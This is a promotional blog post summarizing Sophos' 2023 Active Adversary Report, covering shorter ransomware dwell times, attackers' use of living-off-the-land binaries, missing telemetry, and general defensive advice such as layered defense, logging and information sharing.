Cybersecurity is a never-ending battle. Adversaries continually rush the firewall, simultaneously probing across multiple points, looking for that weak spot that gets them into the system. But if the defenders know what an attack looks like, they can quickly muster their security defenses, contain the breach, and stop the attack cold.
Sophos is on to this and just published the 2023 Active Adversary Report for Security Practitioners. The report outlines what Sophos X-Ops’ Incident Response (IR) team has learned about the current adversary landscape. It offers actionable intelligence on how security practitioners should shape their defensive strategy to stay one step ahead of the attackers.
Adversaries Act Fast
As the Sophos report noted, attack speeds change; attack directions and processes don’t. The median dwell time for a ransomware attack is down to five days or less. These “fast” attacks could mean the ransomware attackers are more well-practiced. And they are also aware that the means of detection have improved, necessitating quicker attacks.
Tactics, techniques, and procedures (TTPs) are the same for attacks above and below the five-day dwell time mark. Most attackers use common and useful “living-of-the-land” binaries (LOLbins) and other legitimate tools and behaviors to execute multi-stage attacks—without being noticed.
Fight Speed with Friction
Cyber defenders need to turn the attacker’s behavior against them. They rely on speed to penetrate an IT system. Increase friction wherever possible to slow them down. In this case, friction means robust layered defenses reliant on sturdy protection and constant monitoring. If you make the attackers' job harder, you can add valuable time to respond, stretching out each stage of an attack.
Defense in depth will work when coupled with complete telemetry. But when telemetry is missing, it only adds time to remediations that most organizations can't afford. The report found that telemetry logs were missing in nearly 42% of the attack cases studied. In 82% of these cases, cybercriminals disabled or wiped out the telemetry to hide their tracks. This is why complete and accurate logging is essential when responding to an active threat.
Also, enterprises should have a response plan for the attacks most likely to affect their business and practice it with their IT department and other stakeholders. The process will help to identify and address system weaknesses before attackers do.
The most important strategic advantage one can cultivate for cyber defense is information sharing. It is good practice to build circles of cybersecurity specialists so that they can share their findings and learn from their successes and failures.
Staying One Step Ahead
Don’t think attackers have an advantage because they are working faster. There is no tangible difference between fast and slow attacks besides speed. The speedy attack can be loud and sloppy.
Sophos can help your customers pick up those signals and do what they have always done: spot the breach, contain the attack, and eliminate the threat.
Read the 2023 Active Adversary Report for Security Practitioners to learn more about attacker behaviors, tools, and techniques.